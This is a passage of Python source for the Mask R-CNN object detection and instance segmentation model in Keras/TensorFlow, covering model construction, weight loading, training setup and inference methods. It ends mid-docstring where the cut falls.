(self.batch_size, self.config.MAX_GT_INSTANCES, 4), dtype=np.int32)
batch_gt_masks = np.zeros(
(self.batch_size, gt_masks.shape[0], gt_masks.shape[1],
self.config.MAX_GT_INSTANCES), dtype=gt_masks.dtype)
if self.random_rois:
batch_rpn_rois = np.zeros(
(self.batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype)
if self.detection_targets:
batch_rois = np.zeros(
(self.batch_size,) + rois.shape, dtype=rois.dtype)
batch_mrcnn_class_ids = np.zeros(
(self.batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype)
batch_mrcnn_bbox = np.zeros(
(self.batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype)
batch_mrcnn_mask = np.zeros(
(self.batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype)
# If more instances than fits in the array, sub-sample from them.
if gt_boxes.shape[0] > self.config.MAX_GT_INSTANCES:
ids = np.random.choice(
np.arange(gt_boxes.shape[0]), self.config.MAX_GT_INSTANCES, replace=False)
gt_class_ids = gt_class_ids[ids]
gt_boxes = gt_boxes[ids]
gt_masks = gt_masks[:, :, ids]
# Add to batch
batch_image_meta[b] = image_meta
batch_rpn_match[b] = rpn_match[:, np.newaxis]
batch_rpn_bbox[b] = rpn_bbox
batch_images[b] = mold_image(image.astype(np.float32), self.config)
batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids
batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes
batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks
if self.random_rois:
batch_rpn_rois[b] = rpn_rois
if self.detection_targets:
batch_rois[b] = rois
batch_mrcnn_class_ids[b] = mrcnn_class_ids
batch_mrcnn_bbox[b] = mrcnn_bbox
batch_mrcnn_mask[b] = mrcnn_mask
b += 1
inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox,
batch_gt_class_ids, batch_gt_boxes, batch_gt_masks]
outputs = []
if self.random_rois:
inputs.extend([batch_rpn_rois])
if self.detection_targets:
inputs.extend([batch_rois])
# Keras requires that output and targets have the same number of dimensions
batch_mrcnn_class_ids = np.expand_dims(
batch_mrcnn_class_ids, -1)
outputs.extend(
[batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask])
return inputs, outputs
############################################################
# MaskRCNN Class
############################################################
class MaskRCNN(object):
"""Encapsulates the Mask RCNN model functionality.
The actual Keras model is in the keras_model property.
"""
def __init__(self, mode, config, model_dir):
"""
mode: Either "training" or "inference"
config: A Sub-class of the Config class
model_dir: Directory to save training logs and trained weights
"""
assert mode in ['training', 'inference']
self.mode = mode
self.config = config
self.model_dir = model_dir
self.set_log_dir()
self.keras_model = self.build(mode=mode, config=config)
def build(self, mode, config):
"""Build Mask R-CNN architecture.
input_shape: The shape of the input image.
mode: Either "training" or "inference". The inputs and
outputs of the model differ accordingly.
"""
assert mode in ['training', 'inference']
        # Image size must be divisible by 2 multiple times
h, w = config.IMAGE_SHAPE[:2]
if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):
            raise Exception("Image size must be divisible by 2 at least 6 times "
                            "to avoid fractions when downscaling and upscaling. "
                            "For example, use 256, 320, 384, 448, 512, ... etc.")
# Inputs
input_image = KL.Input(
shape=[None, None, config.IMAGE_SHAPE[2]], name="input_image")
input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE],
name="input_image_meta")
if mode == "training":
# RPN GT
input_rpn_match = KL.Input(
shape=[None, 1], name="input_rpn_match", dtype=tf.int32)
input_rpn_bbox = KL.Input(
shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32)
# Detection GT (class IDs, bounding boxes, and masks)
# 1. GT Class IDs (zero padded)
input_gt_class_ids = KL.Input(
shape=[None], name="input_gt_class_ids", dtype=tf.int32)
# 2. GT Boxes in pixels (zero padded)
# [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates
input_gt_boxes = KL.Input(
shape=[None, 4], name="input_gt_boxes", dtype=tf.float32)
# Normalize coordinates
gt_boxes = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_gt_boxes)
# 3. GT Masks (zero padded)
# [batch, height, width, MAX_GT_INSTANCES]
if config.USE_MINI_MASK:
input_gt_masks = KL.Input(
shape=[config.MINI_MASK_SHAPE[0],
config.MINI_MASK_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
else:
input_gt_masks = KL.Input(
shape=[config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
elif mode == "inference":
# Anchors in normalized coordinates
input_anchors = KL.Input(shape=[None, 4], name="input_anchors")
# Build the shared convolutional layers.
# Bottom-up Layers
        # Returns a list of the last layers of each stage, 5 in total.
        # The first item (C1) is discarded; C2-C5 feed the FPN top-down pathway below.
if callable(config.BACKBONE):
_, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,
train_bn=config.TRAIN_BN)
else:
_, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE,
stage5=True, train_bn=config.TRAIN_BN)
# Top-down Layers
        # TODO: add assert to verify feature map sizes match what's in config
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)
P4 = KL.Add(name="fpn_p4add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p5upsampled")(P5),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])
P3 = KL.Add(name="fpn_p3add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p4upsampled")(P4),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])
P2 = KL.Add(name="fpn_p2add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p3upsampled")(P3),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])
# Attach 3x3 conv to all P layers to get the final feature maps.
P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p2")(P2)
P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p3")(P3)
P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p4")(P4)
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p5")(P5)
# P6 is used for the 5th anchor scale in RPN. Generated by
# subsampling from P5 with stride of 2.
P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name="fpn_p6")(P5)
# Note that P6 is used in RPN, but not in the classifier heads.
rpn_feature_maps = [P2, P3, P4, P5, P6]
mrcnn_feature_maps = [P2, P3, P4, P5]
# Anchors
if mode == "training":
anchors = self.get_anchors(config.IMAGE_SHAPE)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape)
# A hack to get around Keras's bad support for constants
            # Original TF1-era code:
            # anchors = tf.keras.layers.Lambda(lambda x: tf.Variable(anchors), name="anchors")(input_image)
            # Keras has no constant layer, and the old trick of wrapping a variable
            # in a Lambda layer no longer works in TF2, so a small custom layer
            # (ConstLayer below) is used to return the anchors as a constant tensor.
class ConstLayer(tf.keras.layers.Layer):
def __init__(self, x, name=None):
super(ConstLayer, self).__init__(name=name)
self.x = tf.Variable(x)
def call(self, input):
return self.x
anchors = ConstLayer(anchors, name="anchors")(input_image)
else:
anchors = input_anchors
# RPN Model
rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE,
len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)
# Loop through pyramid layers
layer_outputs = [] # list of lists
for p in rpn_feature_maps:
layer_outputs.append(rpn([p]))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"]
outputs = list(zip(*layer_outputs))
outputs = [KL.Concatenate(axis=1, name=n)(list(o))
for o, n in zip(outputs, output_names)]
rpn_class_logits, rpn_class, rpn_bbox = outputs
# Generate proposals
# Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates
# and zero padded.
proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\
else config.POST_NMS_ROIS_INFERENCE
rpn_rois = ProposalLayer(
proposal_count=proposal_count,
nms_threshold=config.RPN_NMS_THRESHOLD,
name="ROI",
config=config)([rpn_class, rpn_bbox, anchors])
if mode == "training":
# Class ID mask to mark class IDs supported by the dataset the image
# came from.
active_class_ids = KL.Lambda(
lambda x: parse_image_meta_graph(x)["active_class_ids"]
)(input_image_meta)
if not config.USE_RPN_ROIS:
# Ignore predicted ROIs and use ROIs provided as an input.
input_rois = KL.Input(shape=[config.POST_NMS_ROIS_TRAINING, 4],
name="input_roi", dtype=np.int32)
# Normalize coordinates
target_rois = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_rois)
else:
target_rois = rpn_rois
# Generate detection targets
# Subsamples proposals and generates target outputs for training
# Note that proposal class IDs, gt_boxes, and gt_masks are zero
# padded. Equally, returned rois and targets are zero padded.
rois, target_class_ids, target_bbox, target_mask =\
DetectionTargetLayer(config, name="proposal_targets")([
target_rois, input_gt_class_ids, gt_boxes, input_gt_masks])
# Network Heads
# TODO: verify that this handles zero padded ROIs
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
mrcnn_mask = build_fpn_mask_graph(rois, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
            # TODO: clean up (use tf.identity if necessary)
output_rois = KL.Lambda(lambda x: x * 1, name="output_rois")(rois)
# Losses
rpn_class_loss = KL.Lambda(lambda x: rpn_class_loss_graph(*x), name="rpn_class_loss")(
[input_rpn_match, rpn_class_logits])
rpn_bbox_loss = KL.Lambda(lambda x: rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")(
[input_rpn_bbox, input_rpn_match, rpn_bbox])
class_loss = KL.Lambda(lambda x: mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")(
[target_class_ids, mrcnn_class_logits, active_class_ids])
bbox_loss = KL.Lambda(lambda x: mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")(
[target_bbox, target_class_ids, mrcnn_bbox])
mask_loss = KL.Lambda(lambda x: mrcnn_mask_loss_graph(*x), name="mrcnn_mask_loss")(
[target_mask, target_class_ids, mrcnn_mask])
# Model
inputs = [input_image, input_image_meta,
input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes, input_gt_masks]
if not config.USE_RPN_ROIS:
inputs.append(input_rois)
outputs = [rpn_class_logits, rpn_class, rpn_bbox,
mrcnn_class_logits, mrcnn_class, mrcnn_bbox, mrcnn_mask,
rpn_rois, output_rois,
rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss, mask_loss]
model = KM.Model(inputs, outputs, name='mask_rcnn')
else:
# Network Heads
# Proposal classifier and BBox regressor heads
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
# Detections
# output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in
# normalized coordinates
detections = DetectionLayer(config, name="mrcnn_detection")(
[rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta])
# Create masks for detections
detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections)
mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
model = KM.Model([input_image, input_image_meta, input_anchors],
[detections, mrcnn_class, mrcnn_bbox,
mrcnn_mask, rpn_rois, rpn_class, rpn_bbox],
name='mask_rcnn')
# Add multi-GPU support.
if config.GPU_COUNT > 1:
from mrcnn.parallel_model import ParallelModel
model = ParallelModel(model, config.GPU_COUNT)
return model
def find_last(self):
"""Finds the last checkpoint file of the last trained model in the
model directory.
Returns:
The path of the last checkpoint file
"""
# Get directory names. Each directory corresponds to a model
dir_names = next(os.walk(self.model_dir))[1]
key = self.config.NAME.lower()
dir_names = filter(lambda f: f.startswith(key), dir_names)
dir_names = sorted(dir_names)
if not dir_names:
import errno
raise FileNotFoundError(
errno.ENOENT,
"Could not find model directory under {}".format(self.model_dir))
# Pick last directory
dir_name = os.path.join(self.model_dir, dir_names[-1])
# Find the last checkpoint
checkpoints = next(os.walk(dir_name))[2]
checkpoints = filter(lambda f: f.startswith("mask_rcnn"), checkpoints)
checkpoints = sorted(checkpoints)
if not checkpoints:
import errno
raise FileNotFoundError(
errno.ENOENT, "Could not find weight files in {}".format(dir_name))
checkpoint = os.path.join(dir_name, checkpoints[-1])
return checkpoint
def load_weights(self, filepath, by_name=False, exclude=None):
"""Modified version of the corresponding Keras function with
the addition of multi-GPU support and the ability to exclude
some layers from loading.
exclude: list of layer names to exclude
"""
import h5py
from tensorflow.python.keras.saving import hdf5_format
if exclude:
by_name = True
if h5py is None:
raise ImportError('`load_weights` requires h5py.')
with h5py.File(filepath, mode='r') as f:
if 'layer_names' not in f.attrs and 'model_weights' in f:
f = f['model_weights']
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
keras_model = self.keras_model
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
# Exclude some layers
if exclude:
layers = filter(lambda l: l.name not in exclude, layers)
if by_name:
hdf5_format.load_weights_from_hdf5_group_by_name(f, layers)
else:
hdf5_format.load_weights_from_hdf5_group(f, layers)
# Update the log directory
self.set_log_dir(filepath)
def get_imagenet_weights(self):
"""Downloads ImageNet trained weights from Keras.
Returns path to weights file.
"""
from keras.utils.data_utils import get_file
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/'\
'releases/download/v0.2/'\
'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='a268eb855778b3df3c7506639542a6af')
return weights_path
def compile(self, learning_rate, momentum):
"""Gets the model ready for training. Adds losses, regularization, and
metrics. Then calls the Keras compile() function.
"""
# Optimizer object
optimizer = keras.optimizers.SGD(
lr=learning_rate, momentum=momentum,
clipnorm=self.config.GRADIENT_CLIP_NORM)
# Add Losses
loss_names = [
"rpn_class_loss", "rpn_bbox_loss",
"mrcnn_class_loss", "mrcnn_bbox_loss", "mrcnn_mask_loss"]
for name in loss_names:
layer = self.keras_model.get_layer(name)
if layer.output in self.keras_model.losses:
continue
loss = (
tf.reduce_mean(input_tensor=layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_loss(loss)
# Add L2 Regularization
# Skip gamma and beta weights of batch normalization layers.
reg_losses = [
keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(input=w), tf.float32)
for w in self.keras_model.trainable_weights
if 'gamma' not in w.name and 'beta' not in w.name]
self.keras_model.add_loss(tf.add_n(reg_losses))
# Compile
self.keras_model.compile(
optimizer=optimizer,
loss=[None] * len(self.keras_model.outputs))
# Add metrics for losses
for name in loss_names:
if name in self.keras_model.metrics_names:
continue
layer = self.keras_model.get_layer(name)
self.keras_model.metrics_names.append(name)
loss = (
tf.reduce_mean(input_tensor=layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_metric(loss, name=name, aggregation='mean')
def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):
"""Sets model layers as trainable if their names match
the given regular expression.
"""
# Print message on the first call (but not on recursive calls)
if verbose > 0 and keras_model is None:
log("Selecting layers to train")
keras_model = keras_model or self.keras_model
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
for layer in layers:
# Is the layer a model?
if layer.__class__.__name__ == 'Model':
print("In model: ", layer.name)
self.set_trainable(
layer_regex, keras_model=layer, indent=indent + 4)
continue
if not layer.weights:
continue
# Is it trainable?
trainable = bool(re.fullmatch(layer_regex, layer.name))
# Update layer. If layer is a container, update inner layer.
if layer.__class__.__name__ == 'TimeDistributed':
layer.layer.trainable = trainable
else:
layer.trainable = trainable
# Print trainable layer names
if trainable and verbose > 0:
log("{}{:20} ({})".format(" " * indent, layer.name,
layer.__class__.__name__))
def set_log_dir(self, model_path=None):
"""Sets the model log directory and epoch counter.
model_path: If None, or a format different from what this code uses
then set a new log directory and start epochs from 0. Otherwise,
extract the log directory and the epoch counter from the file
name.
"""
# Set date and epoch counter as if starting a new model
self.epoch = 0
now = datetime.datetime.now()
# If we have a model path with date and epochs use them
if model_path:
            # Continue from where we left off. Get epoch and date from the file name.
# A sample model path might look like:
# \path\to\logs\coco20171029T2315\mask_rcnn_coco_0001.h5 (Windows)
# /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5 (Linux)
regex = r".*[/\\][\w-]+(\d{4})(\d{2})(\d{2})T(\d{2})(\d{2})[/\\]mask\_rcnn\_[\w-]+(\d{4})\.h5"
# Use string for regex since we might want to use pathlib.Path as model_path
m = re.match(regex, str(model_path))
if m:
now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)),
int(m.group(4)), int(m.group(5)))
# Epoch number in file is 1-based, and in Keras code it's 0-based.
# So, adjust for that then increment by one to start from the next epoch
self.epoch = int(m.group(6)) - 1 + 1
print('Re-starting from epoch %d' % self.epoch)
# Directory for training logs
self.log_dir = os.path.join(self.model_dir, "{}{:%Y%m%dT%H%M}".format(
self.config.NAME.lower(), now))
# Path to save after each epoch. Include placeholders that get filled by Keras.
self.checkpoint_path = os.path.join(self.log_dir, "mask_rcnn_{}_*epoch*.h5".format(
self.config.NAME.lower()))
self.checkpoint_path = self.checkpoint_path.replace(
"*epoch*", "{epoch:04d}")
def train(self, train_dataset, val_dataset, learning_rate, epochs, layers,
augmentation=None, custom_callbacks=None, no_augmentation_sources=None):
"""Train the model.
train_dataset, val_dataset: Training and validation Dataset objects.
learning_rate: The learning rate to train with
        epochs: Number of training epochs. Note that previous training epochs
            are considered to be done already, so this actually determines
            the epochs to train in total rather than in this particular call.
        layers: Allows selecting which layers to train. It can be:
- A regular expression to match layer names to train
- One of these predefined values:
heads: The RPN, classifier and mask heads of the network
all: All the layers
3+: Train Resnet stage 3 and up
4+: Train Resnet stage 4 and up
5+: Train Resnet stage 5 and up
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug)
augmentation. For example, passing imgaug.augmenters.Fliplr(0.5)
flips images right/left 50% of the time. You can pass complex
augmentations as well. This augmentation applies 50% of the
time, and when it does it flips images right/left half the time
and adds a Gaussian blur with a random sigma in range 0 to 5.
augmentation = imgaug.augmenters.Sometimes(0.5, [
imgaug.augmenters.Fliplr(0.5),
imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0))
])
custom_callbacks: Optional. Add custom callbacks to be called
            with the keras fit() method. Must be a list of keras.callbacks.
no_augmentation_sources: Optional. List of sources to exclude for
            augmentation. A source is a string that identifies a dataset and is
defined in the Dataset class.
"""
assert self.mode == "training", "Create model in training mode."
# Pre-defined layer regular expressions
layer_regex = {
# all layers but the backbone
"heads": r"(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# From a specific Resnet stage and up
"3+": r"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"4+": r"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"5+": r"(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# All layers
"all": ".*",
}
if layers in layer_regex.keys():
layers = layer_regex[layers]
# Data generators
train_generator = DataGenerator(train_dataset, self.config, shuffle=True,
augmentation=augmentation)
val_generator = DataGenerator(val_dataset, self.config, shuffle=True)
# Create log_dir if it does not exist
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
# Callbacks
callbacks = [
#keras.callbacks.TensorBoard(log_dir=self.log_dir,
# histogram_freq=0, write_graph=True, write_images=False),
keras.callbacks.ModelCheckpoint(self.checkpoint_path,
verbose=0, save_weights_only=True),
]
# Add custom callbacks to the list
if custom_callbacks:
callbacks += custom_callbacks
# Train
log("\nStarting at epoch {}. LR={}\n".format(self.epoch, learning_rate))
log("Checkpoint Path: {}".format(self.checkpoint_path))
self.set_trainable(layers)
self.compile(learning_rate, self.config.LEARNING_MOMENTUM)
# Work-around for Windows: Keras fails on Windows when using
# multiprocessing workers. See discussion here:
# https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009
if os.name == 'nt':
workers = 0
else:
workers = multiprocessing.cpu_count()
self.keras_model.fit(
train_generator,
initial_epoch=self.epoch,
epochs=epochs,
steps_per_epoch=self.config.STEPS_PER_EPOCH,
callbacks=callbacks,
validation_data=val_generator,
validation_steps=self.config.VALIDATION_STEPS,
max_queue_size=100,
workers=workers,
            verbose=1,
use_multiprocessing=workers > 1,
)
self.epoch = max(self.epoch, epochs)
def mold_inputs(self, images):
"""Takes a list of images and modifies them to the format expected
as an input to the neural network.
images: List of image matrices [height,width,depth]. Images can have
different sizes.
Returns 3 Numpy matrices:
molded_images: [N, h, w, 3]. Images resized and normalized.
image_metas: [N, length of meta data]. Details about each image.
windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the
original image (padding excluded).
"""
molded_images = []
image_metas = []
windows = []
for image in images:
# Resize image
# TODO: move resizing to mold_image()
molded_image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=self.config.IMAGE_MIN_DIM,
min_scale=self.config.IMAGE_MIN_SCALE,
max_dim=self.config.IMAGE_MAX_DIM,
mode=self.config.IMAGE_RESIZE_MODE)
molded_image = mold_image(molded_image, self.config)
# Build image_meta
image_meta = compose_image_meta(
0, image.shape, molded_image.shape, window, scale,
np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
# Append
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
# Pack into arrays
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
return molded_images, image_metas, windows
def unmold_detections(self, detections, mrcnn_mask, original_image_shape,
image_shape, window):
"""Reformats the detections of one image from the format of the neural
network output to a format suitable for use in the rest of the
application.
detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates
mrcnn_mask: [N, height, width, num_classes]
original_image_shape: [H, W, C] Original image shape before resizing
image_shape: [H, W, C] Shape of the image after resizing and padding
window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real
image is excluding the padding.
Returns:
boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels
class_ids: [N] Integer class IDs for each bounding box
scores: [N] Float probability scores of the class_id
masks: [height, width, num_instances] Instance masks
"""
# How many detections do we have?
# Detections array is padded with zeros. Find the first class_id == 0.
zero_ix = np.where(detections[:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0]
# Extract boxes, class_ids, scores, and class-specific masks
boxes = detections[:N, :4]
class_ids = detections[:N, 4].astype(np.int32)
scores = detections[:N, 5]
masks = mrcnn_mask[np.arange(N), :, :, class_ids]
# Translate normalized coordinates in the resized image to pixel
# coordinates in the original image before resizing
window = utils.norm_boxes(window, image_shape[:2])
wy1, wx1, wy2, wx2 = window
shift = np.array([wy1, wx1, wy1, wx1])
wh = wy2 - wy1 # window height
ww = wx2 - wx1 # window width
scale = np.array([wh, ww, wh, ww])
# Convert boxes to normalized coordinates on the window
boxes = np.divide(boxes - shift, scale)
# Convert boxes to pixel coordinates on the original image
boxes = utils.denorm_boxes(boxes, original_image_shape[:2])
# Filter out detections with zero area. Happens in early training when
# network weights are still random
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
# Resize masks to original image size and set boundary threshold.
full_masks = []
for i in range(N):
# Convert neural network mask to full size mask
full_mask = utils.unmold_mask(masks[i], boxes[i], original_image_shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1)\
if full_masks else np.empty(original_image_shape[:2] + (0,))
return boxes, class_ids, scores, full_masks
def detect(self, images, verbose=0):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(
images) == self.config.BATCH_SIZE, "len(images) must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(images)))
for image in images:
log("image", image)
# Mold inputs to format expected by the neural network
molded_images, image_metas, windows = self.mold_inputs(images)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape,\
"After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes."
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(images):
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
windows[i])
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
def detect_molded(self, molded_images, image_metas, verbose=0):
"""Runs the detection pipeline, but expect inputs that are
molded already. Used mostly for debugging and inspecting
the model.
molded_images: List of images loaded using load_image_gt()
image_metas: image meta data, also returned by load_image_gt()
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(molded_images) == self.config.BATCH_SIZE,\
"Number of images must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(molded_images)))
for image in molded_images:
log("image", image)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape, "Images must have the same size"
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(molded_images):
window = [0, 0, image.shape[0], image.shape[1]]
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
window)
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
def get_anchors(self, image_shape):
"""Returns anchor pyramid for the given image size."""
backbone_shapes = compute_backbone_shapes(self.config, image_shape)
# Cache anchors and reuse if image shape is the same
if not hasattr(self, "_anchor_cache"):
self._anchor_cache = {}
        if tuple(image_shape) not in self._anchor_cache:
# Generate Anchors
a = utils.generate_pyramid_anchors(
self.config.RPN_ANCHOR_SCALES,
self.config.RPN_ANCHOR_RATIOS,
backbone_shapes,
self.config.BACKBONE_STRIDES,
self.config.RPN_ANCHOR_STRIDE)
# Keep a copy of the latest anchors in pixel coordinates because
# it's used in inspect_model notebooks.
            # TODO: Remove this after the notebooks are refactored to not use it
self.anchors = a
# Normalize coordinates
self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2])
return self._anchor_cache[tuple(image_shape)]
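    # Note (illustrative, with the typical defaults of five RPN_ANCHOR_SCALES,
    # three RPN_ANCHOR_RATIOS and RPN_ANCHOR_STRIDE=1 on a 1024x1024 image):
    # the pyramid levels contribute 3 * (256^2 + 128^2 + 64^2 + 32^2 + 16^2)
    # = 261,888 anchors in total.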
def ancestor(self, tensor, name, checked=None):
"""Finds the ancestor of a TF tensor in the computation graph.
tensor: TensorFlow symbolic tensor.
name: Name of ancestor tensor to find
checked: For internal use. A list of tensors that were already
